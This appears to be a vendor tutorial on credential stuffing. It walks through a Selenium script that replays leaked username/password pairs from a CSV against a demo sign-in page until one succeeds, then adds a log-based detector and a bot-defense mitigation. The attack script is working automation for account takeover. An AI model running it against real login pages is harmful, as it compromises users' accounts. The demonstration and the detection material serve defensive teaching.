12-Jul-2022 05:00 - edited 19-Apr-2023 03:40
In everyday applications, confirming the user's identity, authentication, authorization and session management are critical to protecting against authentication-related attacks. An application may have authentication weaknesses if it:
Credential stuffing is a common attack in which attackers replay lists of known (leaked) username/password pairs against a login page with automation tools such as Selenium, Postman, etc. until one of them authenticates. If an application does not implement automated-threat or credential-stuffing protection, an attacker can exploit its login page with exactly this kind of attack.
Step 1:
Follow the steps in the linked article to configure an HTTP load balancer. Do not configure any security policies or Bot Defense on this load balancer, so that the attack in the next steps reaches the application unhindered.
Step 2:
Develop a Selenium script that automates the UI login page, taking one username/password pair per row from a creds.csv file, as below:
from selenium import webdriver
from selenium.webdriver.common.by import By
import argparse
import csv
import time

parser = argparse.ArgumentParser()
parser.add_argument("--backend", help="Use the unprotected backend airline app", action="store_true")
args = parser.parse_args()

# Both branches point at the same sign-in URL in this demo; keep the flag so the
# script can be aimed at the unprotected backend vs. the load balancer VIP in your own setup.
if args.backend:
    target = 'https://jbair.f5-hyd-demo.com/user/signin'
else:
    target = 'https://jbair.f5-hyd-demo.com/user/signin'

# chromedriver must be on PATH (Selenium 4 no longer takes the driver path as the first argument)
driver = webdriver.Chrome()

def loginuser(name, password):
    """Submit one username/password pair through the UI.

    Returns True when the browser is no longer on the sign-in page afterwards,
    which this demo app does only after a successful login (assumption: a failed
    login re-renders /user/signin).
    """
    driver.get(target)
    driver.find_element(By.XPATH, '/html/body/div[2]/div/form/div[1]/input').send_keys(name)
    driver.find_element(By.XPATH, '/html/body/div[2]/div/form/div[2]/input').send_keys(password)
    driver.find_element(By.XPATH, '/html/body/div[2]/div/form/button').click()
    time.sleep(1)  # give the app time to redirect
    return '/user/signin' not in driver.current_url

with open('creds.csv', newline='') as f:
    for row in csv.reader(f):
        name, password = row[0], row[1]
        print(name)
        print(password)
        if loginuser(name, password):
            print('valid credentials found:', name, password)
            break
        time.sleep(1)  # small delay between attempts; no rate limiting is in place here

driver.quit()
Step 3:
Execute the above script to generate the credential stuffing attack and to identify whether any of the provided credentials is valid.
In the above steps we have seen how attackers can find valid accounts from large lists of leaked credentials using a simple automation script.
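The attack above leaves a characteristic footprint in the application's login log: one source trying many distinct usernames in a short time, mostly failing, with the occasional success marking an account that is now compromised. The following detector is an added example (not code from the original article or from F5): it parses a constructed login log of the assumed format "timestamp ip=... user=... result=ok|fail", and flags sources whose sliding window of attempts exceeds thresholds for volume, username spread and failure ratio, while a single user retrying their own password is left alone.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample log (not from the page). Format assumed for this example:
#   <ISO timestamp> ip=<source> user=<username> result=<ok|fail>
# 203.0.113.7 behaves like the Selenium script above; 198.51.100.4 is a user
# who mistypes their own password twice before getting it right.
SAMPLE_LOG = """\
2022-07-12T05:00:01 ip=203.0.113.7 user=alice result=fail
2022-07-12T05:00:02 ip=203.0.113.7 user=bob result=fail
2022-07-12T05:00:03 ip=203.0.113.7 user=carol result=fail
2022-07-12T05:00:04 ip=203.0.113.7 user=dave result=fail
2022-07-12T05:00:05 ip=203.0.113.7 user=erin result=fail
2022-07-12T05:00:06 ip=203.0.113.7 user=frank result=ok
2022-07-12T05:00:10 ip=198.51.100.4 user=alice result=fail
2022-07-12T05:00:40 ip=198.51.100.4 user=alice result=fail
2022-07-12T05:01:20 ip=198.51.100.4 user=alice result=ok
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)


def parse_log(text):
    """Parse log lines into event dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "ip": m["ip"],
            "user": m["user"],
            "ok": m["result"] == "ok",
        })
    return events


def detect_credential_stuffing(events, window=timedelta(minutes=5),
                               min_attempts=5, min_users=4):
    """Return {ip: stats} for sources that, within some sliding time window, made at
    least min_attempts login attempts spread over at least min_users distinct usernames
    with more failures than successes. 'compromised' lists usernames that succeeded
    inside the flagged window, i.e. accounts whose leaked password still works."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_ip[e["ip"]].append(e)

    flagged = {}
    for ip, evs in by_ip.items():
        best = None
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until the window fits the time bound.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            users = {e["user"] for e in win}
            fails = sum(1 for e in win if not e["ok"])
            if (len(win) >= min_attempts and len(users) >= min_users
                    and fails > len(win) - fails):
                stats = {
                    "attempts": len(win),
                    "distinct_users": len(users),
                    "failures": fails,
                    "compromised": sorted(e["user"] for e in win if e["ok"]),
                }
                # Keep the largest qualifying window per source.
                if best is None or stats["attempts"] > best["attempts"]:
                    best = stats
        if best is not None:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    for ip, stats in detect_credential_stuffing(parse_log(SAMPLE_LOG)).items():
        print(ip, stats)
```

The thresholds are deliberately low so the nine-line sample triggers; in production they should be tuned per application, and the same logic should be keyed on other attributes too (user agent, session cookie, JA3 fingerprint), because a real campaign spreads attempts across many source addresses.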
Below are some best practices suggested to prevent credential stuffing attacks:
Mitigation using F5 Distributed Cloud:
Credential stuffing and other brute-force login attacks can be mitigated by configuring Bot Defense on the HTTP load balancer, which identifies and blocks automated clients such as the Selenium script above, thereby preventing forceful browsing and credential stuffing against the application.
For further information click the links below: